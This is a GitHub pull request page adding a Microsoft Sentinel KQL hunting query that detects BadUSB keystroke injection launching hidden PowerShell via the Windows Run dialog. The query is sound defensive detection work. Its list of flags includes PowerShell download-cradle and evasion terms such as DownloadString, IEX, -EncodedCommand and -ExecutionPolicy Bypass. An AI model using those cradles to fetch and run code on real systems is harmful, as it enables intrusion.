Add BadUSB PowerShell Run dialog hunting query (HID injection)#14336
Open
descambiado wants to merge 1 commit into
Open
Add BadUSB PowerShell Run dialog hunting query (HID injection)#14336descambiado wants to merge 1 commit into
descambiado wants to merge 1 commit into
Conversation
Adds a DeviceProcessEvents hunting query that detects PowerShell spawned by explorer.exe with -WindowStyle Hidden and any remote execution or evasion flag, consistent with HID injection payloads using WIN+R. MITRE ATT&CK: T1059.001, T1564.003, T1200
Contributor
There was a problem hiding this comment.
Pull request overview
Note
Copilot was unable to run its full agentic suite in this review.
Adds a new Microsoft Sentinel hunting query to identify likely BadUSB/HID keystroke-injection activity that launches PowerShell via the Windows Run dialog, focusing on explorer.exe parentage plus hidden window + cradle/evasion flags.
Changes:
- Introduces a new hunting query YAML targeting
DeviceProcessEvents(MDE). - Adds MITRE ATT&CK tactics/techniques, entity mappings, and solution metadata fields for the query.
Comment on lines
+4
to
+8
| Identifies PowerShell spawned by explorer.exe with a hidden window and remote | ||
| execution or evasion flags, consistent with BadUSB HID injection payloads that | ||
| open the Windows Run dialog via WIN+R. Keystroke injection via hardware sets | ||
| explorer.exe as the parent; pairing -WindowStyle Hidden with any cradle flag is | ||
| a reliable indicator of automated injection rather than interactive user activity. |
| @@ -0,0 +1,70 @@ | |||
| id: 683b2baa-39c3-457d-b64e-2e57c8fc83ba | |||
| name: BadUSB PowerShell execution via Windows Run dialog (HID injection) | |||
Comment on lines
+23
to
+33
| let EvasionFlags = dynamic([ | ||
| "-NoProfile", | ||
| "-NonInteractive", | ||
| "-EncodedCommand", | ||
| "-ExecutionPolicy Bypass", | ||
| "DownloadString", | ||
| "IEX", | ||
| "Invoke-Expression", | ||
| "WebClient", | ||
| "Start-Process" | ||
| ]); |
| | where FileName in~ ("powershell.exe", "pwsh.exe") | ||
| | where InitiatingProcessFileName =~ "explorer.exe" | ||
| | where ProcessCommandLine has_all ("-WindowStyle", "Hidden") | ||
| | where ProcessCommandLine has_any (EvasionFlags) |
| support: | ||
| tier: Community | ||
| categories: | ||
| domains: [ "Security - Threat Protection", "Endpoints" ] |
| "WebClient", | ||
| "Start-Process" | ||
| ]); | ||
| DeviceProcessEvents |
Comment on lines
+49
to
+60
| | sort by TimeGenerated desc | ||
| entityMappings: | ||
| - entityType: Account | ||
| fieldMappings: | ||
| - identifier: Name | ||
| columnName: AccountName | ||
| - identifier: NTDomain | ||
| columnName: AccountDomain | ||
| - entityType: Host | ||
| fieldMappings: | ||
| - identifier: HostName | ||
| columnName: DeviceName |
Collaborator
|
Hi @descambiado, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Description
Adds a hunting query that detects PowerShell spawned by
explorer.exewith a hidden window and remote execution or evasion flags, consistent with BadUSB / HID injection payloads that open the Windows Run dialog via WIN+R.When a hardware keystroke injector (Flipper Zero, Rubber Ducky, etc.) uses WIN+R to launch a command, the resulting process has
explorer.exeas its parent. Pairing-WindowStyle Hiddenwith any cradle flag is a reliable indicator of automated injection rather than interactive user activity.Detection logic
DeviceProcessEvents(Microsoft Defender for Endpoint)explorer.exepowershell.exeorpwsh.exehas_all("-WindowStyle", "Hidden")ANDhas_anyof 9 evasion/cradle flagstimeframevariable)MITRE ATT&CK
Files changed
Hunting Queries/MultipleDataSources/BadUSBPowerShellRunDialog.yamlTesting
Rule validated end-to-end against a Flipper Zero BadUSB payload. Companion SIGMA rule contributed to SigmaHQ (PR #6028). Source payload and forensic breakdown: https://github.com/descambiado/flipper-purple-team/tree/main/badusb/01-windows-powershell-run-dialog